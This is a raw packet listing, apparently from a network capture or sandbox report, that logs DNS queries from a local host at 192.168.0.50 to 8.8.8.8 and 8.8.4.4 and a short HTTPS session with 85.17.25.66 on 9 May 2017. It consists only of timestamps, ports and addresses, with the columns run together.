Mai 9, 2017 16:26:12.998739004 MESZ53533528.8.8.8192.168.0.50
Mai 9, 2017 16:26:12.999345064 MESZ5335253192.168.0.508.8.4.4
Mai 9, 2017 16:26:13.630573988 MESZ53533528.8.8.8192.168.0.50
Mai 9, 2017 16:26:13.630601883 MESZ53533528.8.4.4192.168.0.50
Mai 9, 2017 16:26:14.201618910 MESZ6351953192.168.0.508.8.8.8
Mai 9, 2017 16:26:14.573122025 MESZ53635198.8.8.8192.168.0.50
Mai 9, 2017 16:26:14.589282990 MESZ5715553192.168.0.508.8.8.8
Mai 9, 2017 16:26:15.562796116 MESZ53571558.8.8.8192.168.0.50
Mai 9, 2017 16:26:15.623080969 MESZ6232653192.168.0.508.8.8.8
Mai 9, 2017 16:26:16.568062067 MESZ53623268.8.8.8192.168.0.50
Mai 9, 2017 16:26:16.646783113 MESZ5283453192.168.0.508.8.8.8
Mai 9, 2017 16:26:17.554605961 MESZ53528348.8.8.8192.168.0.50
Mai 9, 2017 16:26:17.609131098 MESZ5469153192.168.0.508.8.8.8
Mai 9, 2017 16:26:18.753406048 MESZ5469153192.168.0.508.8.8.8
Mai 9, 2017 16:26:21.769840002 MESZ5469153192.168.0.508.8.4.4
Mai 9, 2017 16:26:22.904309034 MESZ5469153192.168.0.508.8.4.4
Mai 9, 2017 16:26:23.564397097 MESZ53546918.8.4.4192.168.0.50
Mai 9, 2017 16:26:23.564429998 MESZ53546918.8.4.4192.168.0.50
Mai 9, 2017 16:26:23.564450026 MESZ53546918.8.8.8192.168.0.50
Mai 9, 2017 16:26:23.564467907 MESZ53546918.8.8.8192.168.0.50
Mai 9, 2017 16:26:23.624594927 MESZ5862353192.168.0.508.8.4.4
Mai 9, 2017 16:26:24.756298065 MESZ5862353192.168.0.508.8.4.4
Mai 9, 2017 16:26:27.900372982 MESZ5862353192.168.0.508.8.8.8
Mai 9, 2017 16:26:29.042088032 MESZ5862353192.168.0.508.8.8.8
Mai 9, 2017 16:26:29.559004068 MESZ53586238.8.8.8192.168.0.50
Mai 9, 2017 16:26:29.559037924 MESZ53586238.8.8.8192.168.0.50
Mai 9, 2017 16:26:29.559055090 MESZ53586238.8.4.4192.168.0.50
Mai 9, 2017 16:26:29.559072018 MESZ53586238.8.4.4192.168.0.50
Mai 9, 2017 16:26:29.625832081 MESZ5907753192.168.0.508.8.8.8
Mai 9, 2017 16:26:30.564300060 MESZ53590778.8.8.8192.168.0.50
Mai 9, 2017 16:26:30.594083071 MESZ6203353192.168.0.508.8.8.8
Mai 9, 2017 16:26:31.735508919 MESZ6203353192.168.0.508.8.8.8
Mai 9, 2017 16:26:34.873931885 MESZ6203353192.168.0.508.8.4.4
Mai 9, 2017 16:26:35.905143976 MESZ6203353192.168.0.508.8.4.4
Mai 9, 2017 16:26:36.557574987 MESZ53620338.8.4.4192.168.0.50
Mai 9, 2017 16:26:36.557610035 MESZ53620338.8.4.4192.168.0.50
Mai 9, 2017 16:26:36.557629108 MESZ53620338.8.8.8192.168.0.50
Mai 9, 2017 16:26:36.557648897 MESZ53620338.8.8.8192.168.0.50
Mai 9, 2017 16:26:37.395664930 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:37.395728111 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:37.396059990 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:37.402023077 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:37.402049065 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:37.671200991 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:37.671219110 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:37.671607018 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:37.671637058 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:37.713063955 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:37.713423014 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:37.771415949 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:37.771444082 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:37.771692038 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:37.771701097 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:37.986696959 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:37.987073898 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:37.988665104 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:37.988684893 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.140960932 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.141391039 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.141877890 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.141896963 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.142903090 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.142915964 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.142920971 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.142930031 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.142931938 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.142935991 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.142950058 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.142965078 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.143323898 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.143333912 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.143340111 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.143346071 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.143349886 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.143356085 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.143358946 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.143364906 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.143368006 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.143373966 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.143377066 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.143382072 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.143385887 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.143385887 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.143393993 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.143404961 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.143723011 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.143732071 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.143738031 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.143743992 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.143747091 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.143753052 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.143755913 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.143762112 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.143764019 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.143769979 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.143773079 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.143779039 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.143781900 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.143788099 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.143790007 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.143795013 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144300938 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144319057 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144325018 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144331932 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144335032 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144340992 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144344091 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144349098 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144352913 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144356966 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144361019 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144362926 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144366026 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144371033 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144371033 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144376040 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144376993 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144381046 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144383907 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144386053 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144390106 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144392014 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144396067 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144397974 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144402027 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144402981 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144407988 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144407988 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144413948 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144418001 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144427061 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144433975 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144582033 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144591093 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144593954 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144599915 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144602060 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144607067 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144756079 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144764900 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144769907 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144777060 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144778967 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144784927 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144788027 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144793034 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144795895 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144800901 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144805908 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144805908 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144810915 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144815922 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144820929 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144828081 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144835949 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144843102 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144845963 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144851923 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144855022 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144860029 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144864082 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.144865036 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144870996 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.144877911 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.145035028 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.145044088 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.145060062 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.145067930 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.145294905 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.145303965 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.145318985 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.145327091 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.145529032 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.145536900 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.145553112 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.145560980 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.146076918 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.146089077 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.146096945 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.146102905 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.146307945 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.146316051 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.146321058 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.146327972 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.146330118 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.146336079 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.146338940 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.146343946 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.146347046 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.146351099 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.146354914 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.146356106 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.146358967 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.146363974 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.146363974 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.146369934 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.146378040 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.146385908 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151235104 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151247025 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151252031 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151257992 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151261091 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151266098 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151269913 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151276112 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151278019 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151283979 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151287079 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151293039 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151295900 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151300907 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151304007 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151309013 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151313066 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151314974 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151316881 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151321888 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151323080 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151328087 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151333094 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151336908 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151365995 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151374102 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151376963 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151381016 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151386023 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151386023 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151390076 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151391983 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151395082 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151396990 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151398897 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151402950 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151405096 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151407957 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151408911 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151412010 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151413918 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151417971 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151420116 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151422977 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151423931 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151429892 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151433945 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151439905 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151479959 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151488066 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151490927 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151498079 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151499987 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151504993 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151509047 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151513100 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151514053 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151516914 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151520014 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151521921 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151525021 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151525974 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151530027 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151534081 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151537895 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151544094 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151669025 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151675940 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151679039 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151684046 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151686907 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151691914 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151695013 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151700020 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151701927 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151706934 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151710033 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151715040 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151717901 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151722908 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151726007 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151731014 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151732922 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151738882 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:39.441178083 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:39.441627026 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:39.442306995 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:39.442332983 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:39.443130016 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:39.443191051 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:39.443445921 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:46.514552116 MESZ5654353192.168.0.508.8.4.4
Mai 9, 2017 16:26:46.514611006 MESZ5017453192.168.0.508.8.4.4
Mai 9, 2017 16:26:47.570800066 MESZ53501748.8.4.4192.168.0.50
Mai 9, 2017 16:26:47.570827961 MESZ53565438.8.4.4192.168.0.50
Mai 9, 2017 16:26:47.607861996 MESZ6037153192.168.0.508.8.4.4
Mai 9, 2017 16:26:47.607943058 MESZ53603718.8.4.4192.168.0.50
Mai 9, 2017 16:26:47.646281958 MESZ5058453192.168.0.508.8.4.4
Mai 9, 2017 16:26:47.646353960 MESZ53505848.8.4.4192.168.0.50
Mai 9, 2017 16:26:47.653693914 MESZ5360353192.168.0.508.8.4.4
Mai 9, 2017 16:26:47.653769016 MESZ5397253192.168.0.508.8.4.4
Mai 9, 2017 16:26:48.539855957 MESZ53539728.8.4.4192.168.0.50
Mai 9, 2017 16:26:48.539880991 MESZ53536038.8.4.4192.168.0.50

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Mai 9, 2017 16:25:37.311839104 MESZ6068353192.168.0.508.8.8.8
Mai 9, 2017 16:25:37.571233988 MESZ53606838.8.8.8192.168.0.50
Mai 9, 2017 16:25:40.101505041 MESZ5679853192.168.0.508.8.8.8
Mai 9, 2017 16:25:40.101547003 MESZ6516853192.168.0.508.8.8.8
Mai 9, 2017 16:25:40.565378904 MESZ53651688.8.8.8192.168.0.50
Mai 9, 2017 16:25:40.565418005 MESZ53567988.8.8.8192.168.0.50
Mai 9, 2017 16:25:42.532700062 MESZ6328153192.168.0.508.8.8.8
Mai 9, 2017 16:25:42.532779932 MESZ5548053192.168.0.508.8.8.8
Mai 9, 2017 16:25:43.600469112 MESZ53554808.8.8.8192.168.0.50
Mai 9, 2017 16:25:43.600500107 MESZ53632818.8.8.8192.168.0.50
Mai 9, 2017 16:25:47.371352911 MESZ6167253192.168.0.508.8.8.8
Mai 9, 2017 16:25:47.371386051 MESZ5394853192.168.0.508.8.8.8
Mai 9, 2017 16:25:47.582999945 MESZ53539488.8.8.8192.168.0.50
Mai 9, 2017 16:25:47.583029985 MESZ53616728.8.8.8192.168.0.50
Mai 9, 2017 16:26:00.207238913 MESZ6098153192.168.0.508.8.8.8
Mai 9, 2017 16:26:00.587764025 MESZ53609818.8.8.8192.168.0.50
Mai 9, 2017 16:26:11.675671101 MESZ5335253192.168.0.508.8.8.8
Mai 9, 2017 16:26:12.677753925 MESZ5335253192.168.0.508.8.8.8
Mai 9, 2017 16:26:12.998739004 MESZ53533528.8.8.8192.168.0.50
Mai 9, 2017 16:26:12.999345064 MESZ5335253192.168.0.508.8.4.4
Mai 9, 2017 16:26:13.630573988 MESZ53533528.8.8.8192.168.0.50
Mai 9, 2017 16:26:13.630601883 MESZ53533528.8.4.4192.168.0.50
Mai 9, 2017 16:26:14.201618910 MESZ6351953192.168.0.508.8.8.8
Mai 9, 2017 16:26:14.573122025 MESZ53635198.8.8.8192.168.0.50
Mai 9, 2017 16:26:14.589282990 MESZ5715553192.168.0.508.8.8.8
Mai 9, 2017 16:26:15.562796116 MESZ53571558.8.8.8192.168.0.50
Mai 9, 2017 16:26:15.623080969 MESZ6232653192.168.0.508.8.8.8
Mai 9, 2017 16:26:16.568062067 MESZ53623268.8.8.8192.168.0.50
Mai 9, 2017 16:26:16.646783113 MESZ5283453192.168.0.508.8.8.8
Mai 9, 2017 16:26:17.554605961 MESZ53528348.8.8.8192.168.0.50
Mai 9, 2017 16:26:17.609131098 MESZ5469153192.168.0.508.8.8.8
Mai 9, 2017 16:26:18.753406048 MESZ5469153192.168.0.508.8.8.8
Mai 9, 2017 16:26:21.769840002 MESZ5469153192.168.0.508.8.4.4
Mai 9, 2017 16:26:22.904309034 MESZ5469153192.168.0.508.8.4.4
Mai 9, 2017 16:26:23.564397097 MESZ53546918.8.4.4192.168.0.50
Mai 9, 2017 16:26:23.564429998 MESZ53546918.8.4.4192.168.0.50
Mai 9, 2017 16:26:23.564450026 MESZ53546918.8.8.8192.168.0.50
Mai 9, 2017 16:26:23.564467907 MESZ53546918.8.8.8192.168.0.50
Mai 9, 2017 16:26:23.624594927 MESZ5862353192.168.0.508.8.4.4
Mai 9, 2017 16:26:24.756298065 MESZ5862353192.168.0.508.8.4.4
Mai 9, 2017 16:26:27.900372982 MESZ5862353192.168.0.508.8.8.8
Mai 9, 2017 16:26:29.042088032 MESZ5862353192.168.0.508.8.8.8
Mai 9, 2017 16:26:29.559004068 MESZ53586238.8.8.8192.168.0.50
Mai 9, 2017 16:26:29.559037924 MESZ53586238.8.8.8192.168.0.50
Mai 9, 2017 16:26:29.559055090 MESZ53586238.8.4.4192.168.0.50
Mai 9, 2017 16:26:29.559072018 MESZ53586238.8.4.4192.168.0.50
Mai 9, 2017 16:26:29.625832081 MESZ5907753192.168.0.508.8.8.8
Mai 9, 2017 16:26:30.564300060 MESZ53590778.8.8.8192.168.0.50
Mai 9, 2017 16:26:30.594083071 MESZ6203353192.168.0.508.8.8.8
Mai 9, 2017 16:26:31.735508919 MESZ6203353192.168.0.508.8.8.8
Mai 9, 2017 16:26:34.873931885 MESZ6203353192.168.0.508.8.4.4
Mai 9, 2017 16:26:35.905143976 MESZ6203353192.168.0.508.8.4.4
Mai 9, 2017 16:26:36.557574987 MESZ53620338.8.4.4192.168.0.50
Mai 9, 2017 16:26:36.557610035 MESZ53620338.8.4.4192.168.0.50
Mai 9, 2017 16:26:36.557629108 MESZ53620338.8.8.8192.168.0.50
Mai 9, 2017 16:26:36.557648897 MESZ53620338.8.8.8192.168.0.50
Mai 9, 2017 16:26:46.514552116 MESZ5654353192.168.0.508.8.4.4
